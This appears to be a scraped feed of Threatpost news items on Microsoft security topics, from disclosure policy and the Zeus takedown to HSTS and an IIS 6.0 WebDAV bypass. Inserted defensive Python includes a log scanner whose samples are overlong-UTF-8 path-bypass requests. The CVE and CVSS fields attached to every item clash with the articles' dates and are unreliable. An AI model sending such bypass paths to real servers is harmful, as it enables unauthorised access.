However, the new philosophy also recognizes that if there are attacks already happening, it may be necessary to release details of the flaw even before a patch is ready.\n\nThe shift is a subtle one from Microsoft, which has always been at the heart of the debate over full disclosure of security vulnerabilities. The company has been very vocal in the past about its assertion that all vulnerabilities in its products should be reported privately to the company and the researcher should then give Microsoft some undisclosed amount of time to come up with a fix. The new CVD strategy still doesn\u2019t lay out a timeline for patch releases, but it represents a public change in the way the company is thinking.\n\nThe new CVD strategy relies on researchers to report vulnerabilities either directly to a vendor or to a trusted third party, such as a CERT-CC, who will then report it to the vendor. The finder and the vendor would then try to agree on a disclosure timeline and work from there. \n\n\u201cNewly discovered vulnerabilities in hardware, software, and services are disclosed directly to the vendors of the affected product, to a CERT-CC or other coordinator who will report to the vendor privately, or to a private service that will likewise report to the vendor privately. The finder allows the vendor an opportunity to diagnose and offer fully tested updates, workarounds, or other corrective measures before detailed vulnerability or exploit information is shared publicly. If attacks are underway in the wild, earlier public vulnerability details disclosure can occur with both the finder and vendor working together as closely as possible to provide consistent messaging and guidance to customers to protect themselves,\u201d said Matt Thomlinson, general manager of Microsoft\u2019s Trustworthy Computing group. 
\n\n\u201cCVD does not represent a huge departure from the current definition of \u2018responsible disclosure,\u2019 and we would still view vulnerability details being released broadly outside these guidelines as putting customers at unnecessary levels of risk. However, CVD does allow for more focused coordination on how issues are addressed publicly. CVD\u2019s core principles are simple: vendors and finders need to work closely toward a resolution; extensive efforts should be made to make a timely response; and only in the event of active attacks is public disclosure, focused on mitigations and workarounds, likely the best course of action \u2014 and even then it should be coordinated as closely as possible.\u201d\n\nThe change from Microsoft comes close on the heels of several other major shifts in the landscape recently, including the decisions by both Google and Mozilla to raise their bounties for security bugs to $3,133.7 and $3,000, respectively. Microsoft has steadfastly refused to pay bug bounties in the past, though there are persistent rumors that the company may do so at some point in the near future. \n\nThe CVD plan closely resembles other disclosure strategies that have been released over the years, and incorporates some elements of plans that researchers have suggested. The use of trusted third parties, such as the CERT-CC, is something that has been suggested by a number of people in the past, and has the advantage of including a dispassionate organization that can work with both the researcher and the vendor when conflicts arise or if the vendor is unresponsive. 
\n\nThe new CVD policy, in fact, incorporates some of the elements that were laid out in a [plan written by the defunct Organization for Internet Safety in 2004](<http://www.symantec.com/security/OIS_Guidelines%20for%20responsible%20disclosure.pdf>), particularly the usage of third parties to help moderate the process.\n\nThe key concession in the new CVD strategy is the acknowledgement that there are times when it may be necessary for the researcher to disclose details of a given vulnerability before a patch is ready. This often is done if a vendor is not responsive to the researcher or if the researcher doesn\u2019t think the vendor is making a good faith effort to fix a flaw quickly enough. However, as Microsoft says in its policy, disclosure of flaw details may be necessary in cases where attacks against the vulnerability are already underway in the wild and security staffs need information on the problem to help protect their networks. \n\nKatie Moussouris, a senior security strategist at Microsoft, said in a [related blog post](<http://blogs.technet.com/b/ecostrat/archive/2010/07/22/coordinated-vulnerability-disclosure-bringing-balance-to-the-force.aspx>) that the company needs help from the research community to make this CVD philosophy work.\n\n\u201cResponsible Disclosure should be deprecated in favor of something focused on getting the job done, which is to improve security and to protect users and systems. As such, Microsoft is asking researchers to work with us under Coordinated Vulnerability Disclosure, and added some coordinated public disclosure possibilities before a vendor-supplied patch is available when active attacks are underway. It uses the trigger of attacks in the wild to switch modes, which is an event that is objectively observable by many independent sources,\u201d she wrote. 
\u201cMake no mistake about it, CVD is basically founded on the initial premise of Responsible Disclosure, but with a coordinated public disclosure strategy if attacks begin in the wild. That said, what\u2019s critical in the reframing is the heightened role coordination and shared responsibility play in the nature and accepted practice of vulnerability disclosure. This is imperative to understand amidst a changing threat landscape, where we all accept that no longer can one individual, company or technology solve the online crime challenge.\u201d\n", "cvss3": {}, "published": "2010-07-22T16:50:37", "type": "threatpost", "title": "Microsoft Shifts to 'Coordinated Vulnerability Disclosure' Policy", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:21:38", "id": "THREATPOST:E539817E8025A93279C63158F37F2DFB", "href": "https://threatpost.com/microsoft-shifts-coordinated-vulnerability-disclosure-policy-072210/74247/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:28", "description": "Microsoft has gone after another botnet, this time targeting some of the command-and-control infrastructure behind the Zeus network with a takedown effort that included seizing two IP addresses used for C&C servers and filing suit against 39 unnamed defendants. 
The action against Zeus is the latest in a string of such moves by Microsoft and some of its partners against the operators of botnets such as [Kelihos](<https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/>) and [Waledac](<https://threatpost.com/waledac-botnet-now-completely-crippled-experts-say-031610/>).\n\nZeus is one of the more widespread and well-known pieces of malware to appear in the last five years and is among the new breed of tools that\u2019s sold in various forms to anyone who can pay the freight. The Zeus kit enables an attacker to monitor a user\u2019s actions on a compromised machine, steal credentials for online banking or other valuable sites and then rack up huge profits. Like other major botnets operating right now, the Zeus network is not one botnet but dozens and dozens of individual networks operated by various criminals around the world. \n\nMicrosoft\u2019s anti-Zeus operation resulted in the takedown of two C&C servers that are used in the global Zeus network, but the company\u2019s officials say they have no illusions that this move will cripple the entire Zeus system. \n\n\u201cWe don\u2019t expect this action to have wiped out every Zeus botnet operating in the world. However, together, we have proactively disrupted some of the most harmful botnets, and we expect this effort will significantly impact the cybercriminal underground for quite some time. Cybercriminals are in this for the money and this action was an unprecedented strike against the illicit infrastructure on which they rely. 
The operation will help further investigations against those responsible for the threat and help us better protect victims,\u201d Richard Domingues Boscovich, a senior attorney in Microsoft\u2019s Digital Crimes Unit, wrote in an analysis of the [Zeus botnet takedown](<http://blogs.technet.com/b/microsoft_blog/archive/2012/03/25/microsoft-and-financial-services-industry-leaders-target-cybercriminal-operations-from-zeus-botnets.aspx>).\n\nLast Monday, Microsoft [filed suit in the Eastern District of New York](<http://www.zeuslegalnotice.com/>) against the unnamed defendants, saying that they, using various aliases and handles, had operated the Zeus botnet. The company, along with the National Automated Clearing House Association, asked the court for permission to cut off the C&C infrastructure of Zeus and also asked that the case be temporarily sealed in order to preserve the element of surprise against the suspects. The court granted both requests, and on Friday officials from Microsoft, NACHA and the Financial Services Information Sharing and Analysis Center (FS-ISAC) went with U.S. Marshals to execute the seizure of the servers.\n\n\u201cOn March 23, Microsoft, FS-ISAC and NACHA \u2013 escorted by the U.S. Marshals \u2013 successfully executed a coordinated physical seizure of command and control servers in two hosting locations to seize and preserve valuable data and virtual evidence from the botnets for the case. We took down two IP addresses behind the Zeus \u2018command and control\u2019 structure. Microsoft also currently monitors 800 domains secured in the operation, which helps us to identify thousands of Zeus-infected computers,\u201d Boscovich said. \n\nThe botnets affected by the Zeus takedown action include some running the Ice-IX and SpyEye variants of the malware. 
The Zeus codebase has forked and evolved over time and some features of the once-competitive SpyEye toolkit were included in some versions recently.\n\nIn an interesting twist to the takedown, Microsoft and the other plaintiffs in the case decided to use the civil section of the RICO statute to go after the group of defendants, allowing them to group the alleged botnet controllers under the umbrella of one organized criminal enterprise. The statute typically is used in organized crime prosecutions, but the nature of the Zeus operation lent itself to the same kind of action.\n\n\u201cUpon information and belief, John Does 1-39 constitute a group of persons associated together for a common purpose of engaging in a course of conduct, as part of an ongoing organization, with the various associates functioning as a continuing unit. The Defendants\u2019 enterprise has a purpose, with relationships among those associated with the enterprise, and longevity sufficient to permit those associates to pursue the enterprise\u2019s purpose. Upon information and belief, Defendants John Doe 1, John Doe 2, and John Doe 3 conspired to, and did, form an association-in-fact enterprise (hereinafter the \u201cZeus Racketeering Enterprise\u201d) with a common purpose of developing and operating a global credential stealing botnet operation as set forth in detail herein,\u201d the complaint filed against the botnet operators says. 
\n\n\u201cBoth the purpose of the Zeus Racketeering Enterprise and the relationship between the Defendants is proven by: (1) the consolidation of the original Zeus botnet and the SpyEye botnet; (2) the subsequent development and operation of the enhanced Ice-IX botnet; and (3) Defendants\u2019 respective and interrelated roles in the sale, operation of, and profiting from the Zeus Botnets in furtherance of Defendants\u2019 common financial interests.\u201d\n\nMicrosoft\u2019s Boscovich said the use of RICO was an important aspect of the case.\n\n\u201cIn criminal court cases, the RICO Act is often associated with cases against organized crime; the same is true in applying the civil section of the law to this case against what we believe is an organization of people behind the Zeus family of botnets. By incorporating the use of the RICO Act, we were able to pursue a consolidated civil case against everyone associated with the Zeus criminal operation, even if those involved in the \u2018organization\u2019 were not necessarily part of the core enterprise,\u201d he said.\n", "cvss3": {}, "published": "2012-03-26T12:05:14", "type": "threatpost", "title": "Microsoft, Financial Groups Execute Takedown of Zeus Botnet Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:34", "id": "THREATPOST:8D91C617AB6DA9813465DF309507F9F5", "href": "https://threatpost.com/microsoft-financial-groups-execute-takedown-zeus-botnet-servers-032612/76364/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:09", "description": "Microsoft launched a new transparency website this week that bundles reports detailing requests for data the company has received, including those from law enforcement, the government, and elsewhere.\n\nThe page, which Microsoft is calling its [Transparency 
Hub](<http://www.microsoft.com/about/corporatecitizenship/en-us/transparencyhub/>), is somewhat similar to [what Apple did last month](<https://threatpost.com/apple-goes-all-in-on-privacy/114846/>) when it looped all of its transparency reports together on one page.\n\nWhile Microsoft has issued transparency reports regarding requests from law enforcement and the U.S. government in the past, this is the first time it\u2019s broken down requests the company has received from other parties to outright remove content on sites such as its search engine Bing.\n\nLike the other two reports, the \u201c[Content Removal Requests Report](<http://www.microsoft.com/about/corporatecitizenship/en-us/transparencyhub/crrr/>)\u201d pertains to requests from the first six months of the calendar year. The main difference is this report mostly culls information on requests from other governments, requests from European residents citing a special European Court of Justice ruling, and requests from copyright owners claiming their work was infringed.\n\nAccording to the report, China far and away had the most requests for content to be removed, with 165 requests filed compared to 11 from the United States, and 10 from Austria, Germany, Russia, and the U.K. combined. The report doesn\u2019t specify exactly what the content was or where it was located, but claims the numbers are from Microsoft entities like Bing, OneDrive, and MSN.\n\nThere were many more requests to remove copyrighted information, just north of one million, according to Microsoft. In this case, it was usually URLs that were being shown in Bing searches that contained copyrighted material. Microsoft claims it complied with 92 percent of requests. Since this is an inaugural report however, there are no statistics from last year to compare the numbers to.\n\nThe company received 3,546 requests from European residents to remove results for queries in Bing that included their name. 
The European Court of Justice\u2019s 2014 \u2018Right To Be Forgotten\u2019 ruling allows individuals to ask that search results returned for their name be removed if those results are inadequate, inaccurate or no longer relevant. Microsoft complied with 50 percent of those requests.\n\nAs far as law enforcement requests, Microsoft received 35,228, a slight uptick from the second half of 2014 when it received 31,002. The report claims only three percent of requests it received led to the disclosure of content customers created, shared or stored on its services. The company rejected 12 percent of requests, up from 7.5 percent in the second half of last year.\n\nThe company, as it\u2019s done for the past several years, also claims it received somewhere [between zero and 999 National Security Letters](<http://www.microsoft.com/about/corporatecitizenship/en-us/transparencyhub/fisa/>). The government only permits companies to disclose requests in bands of 1000, which explains the vague number.\n\nThe company got permission to start sharing information pertaining to legal demands it receives in early 2014 but has been posting the reports pertaining to law enforcement twice a year [since 2013](<https://threatpost.com/microsoft-transparency-report-shows-company-supplied-user-content-22-cases-032113/77653/>), largely in response to a growing demand for transparency from big data companies in the post-Snowden world.\n", "cvss3": {}, "published": "2015-10-15T15:32:57", "type": "threatpost", "title": "Latest Microsoft Transparency Report Details Content Removal Requests", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-10-15T19:32:57", "id": "THREATPOST:6232FE8F8C59D8BBBD6CD0EAAD3D4AA3", "href": "https://threatpost.com/latest-microsoft-transparency-report-details-content-removal-requests/115062/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:45", "description": "In the midst of a relatively light 
[Patch Tuesday](<https://threatpost.com/critical-ie-update-one-of-eight-microsoft-security-bulletins/113231>), Microsoft yesterday introduced an [extra measure of security](<http://blogs.windows.com/msedgedev/2015/06/09/http-strict-transport-security-comes-to-internet-explorer-11-on-windows-8-1-and-windows-7/>) for users running Internet Explorer 11 on Windows 7 and Windows 8.1 machines: HSTS.\n\nShort for HTTP Strict Transport Security, HSTS is a policy a site declares with the Strict-Transport-Security response header. Once a browser has seen that header over HTTPS for a host, or finds the host on a [preloaded list of sites](<https://hstspreload.appspot.com/>) that covers even the first visit, it rewrites any http:// request to that host to https:// before the request leaves the machine, so there is no plaintext leg for an attacker to intercept or downgrade. HSTS does not itself encrypt anything; it removes the window in which a man-in-the-middle can strip TLS from a session. According to OWASP, HSTS also defeats attackers who present invalid digital certificates, because for an HSTS host the browser treats certificate errors as fatal and gives the user no option to click through. It likewise keeps an HTTPS page from fetching HTTP links or subresources over an unencrypted connection.\n\n[HSTS is already on by default](<https://support.microsoft.com/de-de/kb/3058515/en-us>) in Internet Explorer 11 available in the Windows 10 Insider Preview and the new Microsoft Edge expected to be available when Windows 10 releases later this year.\n\n\u201cSite developers can use HSTS policies to secure connections by opting in to an HSTS preload list, which registers websites to be hardcoded by Microsoft Edge, Internet Explorer, and other browsers to redirect HTTP traffic to HTTPS,\u201d said Kyle Pflug, program manager with the Microsoft Edge team. \u201cCommunications with these websites from the initial connection are automatically upgraded to be secure.\u201d\n\nMicrosoft is the last of the major browser vendors to add HSTS support. 
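To make the mechanics concrete, the following Python is an added example (not code from the article, from Microsoft or from any browser) of the client-side logic HSTS asks a browser to implement under RFC 6797: parse the Strict-Transport-Security header, cache the policy only when it arrived over HTTPS, honour max-age expiry and includeSubDomains, consult a preload list for first visits, rewrite http:// URLs to https:// before any request is sent, and refuse certificate-error overrides for known hosts. The host names, the preload entries and the injectable clock are constructed stand-ins.

```python
"""Client-side HSTS (RFC 6797) policy store and HTTP-to-HTTPS upgrade.

Added example; not code from the article or from Microsoft. Host names and
the preload entries are constructed stand-ins.
"""
import time
from dataclasses import dataclass
from urllib.parse import urlsplit, urlunsplit


def parse_sts(value):
    """Parse a Strict-Transport-Security header value.

    Returns (max_age_seconds, include_subdomains), or None when the header is
    malformed and must be ignored (missing max-age, duplicate directives).
    Directive names are case-insensitive; unknown directives are skipped.
    """
    max_age, include_subdomains, seen = None, False, set()
    for raw in value.split(";"):
        token = raw.strip()
        if not token:
            continue
        name, _, val = token.partition("=")
        name, val = name.strip().lower(), val.strip().strip('"')
        if name in seen:            # RFC 6797 6.1: a directive MUST NOT appear twice
            return None
        seen.add(name)
        if name == "max-age":
            if not val.isdigit():
                return None
            max_age = int(val)
        elif name == "includesubdomains":
            include_subdomains = True
    if max_age is None:             # max-age is REQUIRED
        return None
    return max_age, include_subdomains


@dataclass
class Policy:
    expires: float
    include_subdomains: bool


class HstsStore:
    """Remembers which hosts must only be reached over HTTPS."""

    def __init__(self, preload=None, clock=time.time):
        self.clock = clock
        self.preload = dict(preload or {})   # host -> includeSubDomains flag
        self.policies = {}                   # host -> Policy

    def observe(self, host, header_value, over_https):
        """Record the header from a response. Returns True if a policy changed."""
        # RFC 6797 8.1: a header seen over plain HTTP (or over a connection with
        # certificate errors) MUST be ignored, or an attacker could plant policy.
        if not over_https or header_value is None:
            return False
        parsed = parse_sts(header_value)
        if parsed is None:
            return False
        max_age, include_subdomains = parsed
        host = host.lower()
        if max_age == 0:                     # max-age=0 revokes a cached policy
            self.policies.pop(host, None)
            return True
        self.policies[host] = Policy(self.clock() + max_age, include_subdomains)
        return True

    def is_known(self, host):
        """True if host, or a covering parent with includeSubDomains, has an unexpired policy."""
        labels = host.lower().split(".")
        for i in range(len(labels)):
            candidate, exact = ".".join(labels[i:]), i == 0
            if candidate in self.preload and (exact or self.preload[candidate]):
                return True
            policy = self.policies.get(candidate)
            if policy is None:
                continue
            if policy.expires <= self.clock():   # lazily drop expired entries
                del self.policies[candidate]
                continue
            if exact or policy.include_subdomains:
                return True
        return False

    def upgrade(self, url):
        """Rewrite an http:// URL to https:// for known hosts, before any request is sent."""
        parts = urlsplit(url)
        if parts.scheme != "http" or not self.is_known(parts.hostname or ""):
            return url
        netloc = parts.netloc
        if parts.port == 80:                 # RFC 6797 8.3: port 80 becomes the implicit 443
            netloc = netloc.rsplit(":", 1)[0]
        return urlunsplit(("https", netloc, parts.path, parts.query, parts.fragment))

    def allow_cert_error_override(self, host):
        """On a known host, certificate errors are fatal: no click-through for the user."""
        return not self.is_known(host)
```

The two checks worth noticing are the ones attackers rely on being absent: a policy is only cached when the header came over HTTPS (otherwise a man-in-the-middle on the plaintext side could plant or extend policy), and an expired or max-age=0 entry silently stops upgrading, which is why real browsers refresh the policy on every HTTPS response and why the preload list exists for the first visit.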
Google Chrome and Mozilla Firefox have supported HSTS since 2011, while Apple added it to Safari with OS X 10.9 Mavericks.\n\nThe move comes on the heels of Microsoft in May bringing Perfect Forward Secrecy to Windows. Forward secrecy has of late been considered an essential security measure, especially for new applications. It ensures that each session negotiates its own ephemeral key (via an ephemeral Diffie-Hellman exchange) that is discarded afterwards, so a later compromise of the server\u2019s long-term private key does not expose recorded past sessions; an attacker would have to break each session\u2019s key separately.\n\nThe addition of HSTS was included in a [cumulative update for Internet Explorer](<https://technet.microsoft.com/en-us/library/security/ms15-056.aspx>) released yesterday. The security bulletin included patches for two dozen vulnerabilities in the browser, most of which gave attackers the ability to remotely execute code on a vulnerable computer.\n\nHSTS also changes how mixed content is handled, that is, a page delivered over HTTPS that loads script or other resources from an insecure HTTP source.\n\n\u201cWhen we initially announced HSTS in Windows 10, we noted that mixed content is not supported on servers supporting HSTS. With today\u2019s updates, this is still the case in Microsoft Edge on Windows 10 \u2013 mixed content is always blocked on these servers,\u201d Pflug said. 
\u201cFor Internet Explorer 11 on Windows 10, Windows 8.1, and Windows 7, the Information bar will prompt the user to proceed in mixed content scenarios.\u201d\n", "cvss3": {}, "published": "2015-06-10T11:47:26", "type": "threatpost", "title": "Microsoft Brings HSTS to Windows 7 and 8.1", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-06-12T15:00:26", "id": "THREATPOST:0E875F36B37069C0CA4DC570FE3BD197", "href": "https://threatpost.com/microsoft-brings-hsts-to-windows-7-and-8-1/113258/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:03", "description": "Microsoft dismissed recently-disclosed threats to its BitLocker disk-encryption technology as \u201crelatively low risk,\u201d noting that attackers must not only have physical access to a targeted PC, but must manipulate the machine two separate times. [Read the full article](<http://www.computerworld.com/s/article/9141959/Microsoft_downplays_Windows_BitLocker_attack_threat>). 
[Computerworld] \n", "cvss3": {}, "published": "2009-12-08T20:24:42", "type": "threatpost", "title": "MS Says Bitlocker Threat Pretty Low", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:57:07", "id": "THREATPOST:CB62075A4B035B08FDA602FF702FBB71", "href": "https://threatpost.com/ms-says-bitlocker-threat-pretty-low-120809/73227/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:22", "description": "Next week\u2019s Microsoft [Patch Tuesday security bulletins](<https://technet.microsoft.com/en-us/library/security/MS14-AUG>) will not only bring nine new security bulletins but also an update to Internet Explorer that blocks outdated ActiveX controls, starting with Java.\n\nNotifications will flag the older ActiveX controls and users will have the option to update the control immediately or run it for a particular instance. IT administrators will also have the option to configure the update to block older controls outright, and not just warn the user.\n\n\u201cBecause many ActiveX controls aren\u2019t automatically updated, they can become outdated as new versions are released,\u201d Microsoft said this week in its [announcement](<http://blogs.msdn.com/b/ie/archive/2014/08/06/internet-explorer-begins-blocking-out-of-date-activex-controls.aspx>). \u201cIt\u2019s very important that you keep your ActiveX controls up-to-date because malicious or compromised Web pages can target security flaws in outdated controls to collect information, install dangerous software, or let someone else control your computer remotely.\u201d\n\nThe update, called out-of-date ActiveX control blocking, fires off a flag when the browser stops a website from loading an older control, while still allowing a user to interact with the rest of the page that is unaffected by the control. 
In addition to being able to update the control, IT shops can get an inventory of resident ActiveX controls via a new logging setting in Group Policy, Microsoft said.\n\nThe setting lists ActiveX controls that are permissible or will be blocked.\n\n\u201cCreating an inventory of ActiveX controls can also show which ActiveX controls are compatible with Enhanced Protected Mode, an Internet Explorer 11 security feature which provides additional protection against browser exploits\u2014but not all ActiveX controls are compatible with EPM, so this feature can help assess your organization\u2019s readiness for blocking out-of-date ActiveX controls and enabling EPM,\u201d Microsoft said.\n\nIn all, there are four new Group Policy settings related to the new update, including an enforced blocking setting that denies users the ability to use the \u201cRun This Time\u201d option in the notification. Admins can also create a list of top-level domains, host names or files where IE will not block outdated controls, or disable the feature altogether. The feature is also off by default in the Local Intranet Zone and Trusted Sites Zone, allowing intranet sites and homegrown apps to run unimpeded inside the firewall.\n\nMicrosoft said next Tuesday\u2019s update will start with blocking older versions of Java, including Java SE 8 prior to update 11, Java SE 7 prior to update 65 and Java 6 prior to update 81. The update will be supported only on IE 8-11 on Windows 7 SP1 and the IE versions supported on Windows 8 and higher, and it applies in all Security Zones other than the Local Intranet and Trusted Sites zones noted above.\n\n\u201cWe know that many organizations still rely on the capabilities of ActiveX controls, but out-of-date ActiveX controls are a risk today,\u201d Microsoft said. 
\u201cBy helping consumers stay up-to-date\u2014and enabling IT to better manage ActiveX controls, including those that are compatible with Enhanced Protected Mode\u2014Microsoft is helping customers stay safer online.\u201d\n\nAs for the regularly scheduled Patch Tuesday security bulletins, two of the nine are rated critical, but three bulletins address remote code execution vulnerabilities. The two critical RCE bugs are in IE and Windows Media Center TV Pack for Vista respectively, while the third, rated important likely because it requires user interaction, is in Office, specifically OneNote 2007 SP3.\n\nFour other important bulletins address elevation of privilege bugs in Microsoft SQL Server, Windows Server, and Microsoft SharePoint Server 2013.\n\nFinally, two security feature bypass vulnerabilities are also being patched in the .NET framework and Windows Server.\n", "cvss3": {}, "published": "2014-08-08T11:55:44", "type": "threatpost", "title": "IE to Block Older ActiveX Controls, Starting with Java", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-08T15:55:44", "id": "THREATPOST:AE6ADD184BCB4B6C0DCF53BEE513E9DD", "href": "https://threatpost.com/ie-to-block-older-activex-controls-starting-with-java/107672/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:04", "description": "A new remotely-exploitable vulnerability has been found in the Microsoft IIS 6.0 Web server. The flaw is quite similar to one that was discovered eight years ago in earlier versions of IIS, and exploitation of the weakness could enable an attacker to upload content to the vulnerable server.\n\nThe vulnerability is in the implementation of the WebDAV protocol in IIS 6.0, which allows remote users to access and modify documents on a Web server. 
News of the vulnerability, discovered by a researcher named Nikolaos Rangos, hit the [Full Disclosure security mailing list](<http://seclists.org/fulldisclosure/2009/May/att-0134/IIS_Advisory_pdf>) last week. Here are the details, from Rangos\u2019s advisory:\n\nThis vulnerability allows remote attackers to bypass access restrictions on vulnerable installations of Internet Information Server 6.0. The specific flaw exists within the WebDAV functionality of IIS 6.0. The Web Server fails to properly handle unicode tokens when parsing the URI and sending back data. Exploitation of this issue can result in the following:\n\u2013 Authentication bypass of password protected folders\n\u2013 Listing, downloading and uploading of files into a password protected WebDAV folder\n\nThere is no patch available for this vulnerability, so experts at the SANS Internet Storm Center are recommending that people disable WebDAV in the interim. Thierry Zoller has a good analysis of the [IIS 6.0 vulnerability](<http://blog.zoller.lu/2009/05/iis-6-webdac-auth-bypass-and-data.html>) as well.\n\nMicrosoft\u2019s Security Response Center is investigating the WebDAV vulnerability and is in the process of putting together an advisory on it.\n\n\u201cMicrosoft is investigating new public claims of a possible vulnerability in Internet Information Services. We\u2019re currently unaware of any attacks trying to use the claimed vulnerability or of customer impact. 
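Rangos's advisory describes the bug only as IIS 6.0 failing to handle Unicode tokens when parsing the URI. One well-known class of such bugs is non-shortest-form (overlong) UTF-8 in percent-encoded paths, where a lenient decoder turns a byte sequence such as `%c0%af` into `/` after access checks have already run on the literal string. Whether that is exactly the IIS 6.0 flaw is not stated on this page, so the following Python, an added example and not code from the advisory, from Microsoft or from SANS, is a general screen a defender can run over WebDAV request logs while WebDAV is disabled: it decodes each logged path strictly, shows what a lenient decoder would have produced, and flags requests whose lenient view contains path separators the literal request did not. The log lines are constructed samples in a simplified W3C field layout, not real traffic.

```python
"""Screen IIS-style request logs for non-canonical (overlong) UTF-8 in URI paths.

Added example, not code from the advisory or from Microsoft. The byte
sequences and the log lines below are constructed samples.
"""
from urllib.parse import unquote_to_bytes


def lenient_utf8(data: bytes) -> str:
    """Decode UTF-8 the way a careless parser might: accept overlong sequences
    (e.g. C0 AF for '/') instead of rejecting them. Used here only to show what
    such a parser would see; production code must use a strict decoder."""
    out, i, n = [], 0, len(data)
    while i < n:
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
            continue
        if 0xC0 <= b < 0xE0:
            need, cp = 1, b & 0x1F
        elif 0xE0 <= b < 0xF0:
            need, cp = 2, b & 0x0F
        elif 0xF0 <= b < 0xF8:
            need, cp = 3, b & 0x07
        else:                                    # stray continuation or invalid lead byte
            out.append("\ufffd")
            i += 1
            continue
        if i + need >= n or any((data[i + k] & 0xC0) != 0x80 for k in range(1, need + 1)):
            out.append("\ufffd")                  # truncated or malformed sequence
            i += 1
            continue
        for k in range(1, need + 1):
            cp = (cp << 6) | (data[i + k] & 0x3F)  # no shortest-form check: that is the bug
        out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
        i += need + 1
    return "".join(out)


def analyze_path(raw_path: str) -> dict:
    """Compare the strict and lenient decodings of a percent-encoded path."""
    data = unquote_to_bytes(raw_path)
    try:
        data.decode("utf-8")                      # Python's decoder rejects overlong forms
        invalid_utf8 = False
    except UnicodeDecodeError:
        invalid_utf8 = True
    lenient = lenient_utf8(data)
    # Path-significant characters the literal request actually contained,
    # counting their plain percent-encodings as visible to a naive filter.
    visible = raw_path
    for enc, ch in (("%2F", "/"), ("%2f", "/"), ("%5C", "\\"), ("%5c", "\\"), ("%2E", "."), ("%2e", ".")):
        visible = visible.replace(enc, ch)
    smuggled = sorted(c for c in "/\\." if lenient.count(c) > visible.count(c))
    return {
        "path": raw_path,
        "invalid_utf8": invalid_utf8,
        "lenient_view": lenient,
        "smuggled": smuggled,                     # separators only a lenient decoder sees
        "suspicious": invalid_utf8 and bool(smuggled),
    }


# Constructed sample log (simplified W3C fields: date time method uri-stem status).
SAMPLE_LOG = """\
2009-05-18 10:00:01 PROPFIND /protected/ 401
2009-05-18 10:00:02 GET /%c0%afprotected/secret.txt 200
2009-05-18 10:00:03 GET /docs/%C3%A9t%C3%A9.txt 200
2009-05-18 10:00:04 PROPFIND /%e0%80%afprotected/ 207
2009-05-18 10:00:05 GET /public/index.html 200
"""


def scan_log(text: str) -> list:
    """Return (time, method, raw path, lenient view) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        result = analyze_path(fields[3])
        if result["suspicious"]:
            hits.append((fields[1], fields[2], fields[3], result["lenient_view"]))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("suspicious request:", hit)
```

Requiring both conditions (the strict decoder rejects the bytes and the lenient view gains a separator) keeps ordinary non-ASCII file names and stray Latin-1 bytes out of the alert list; a request that trips both is exactly the shape an access-control bypass through the decoder takes, whatever the specific server bug.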
We are working on a security advisory to provide customers with guidance to help protect themselves,\u201d said Christopher Budd, security response communications lead at Microsoft.\n", "cvss3": {}, "published": "2009-05-18T15:36:07", "type": "threatpost", "title": "Serious new flaw found in IIS 6.0", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:13", "id": "THREATPOST:7957677E374E9980D5154F756D4A2E00", "href": "https://threatpost.com/serious-new-flaw-found-iis-60-051809/72672/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:47", "description": "Microsoft today announced plans to share pre-patch details on software vulnerabilities with governments around the world under a new program aimed at securing critical infrastructure and government assets from hacker attacks.\n\nThe program, codenamed Omega, features a Defensive Information Sharing Program (DISP) that will offer government entities at the national level technical information on vulnerabilities that are being updated in Microsoft products.\n\nMicrosoft\u2019s Steve Adegbite [explains](<http://blogs.technet.com/ecostrat/archive/2010/05/17/strengthening-the-security-cooperation-program.aspx>):\n\n_We will provide this information after our investigative and remediation cycle is completed to ensure that DISP members are receiving the most current information. 
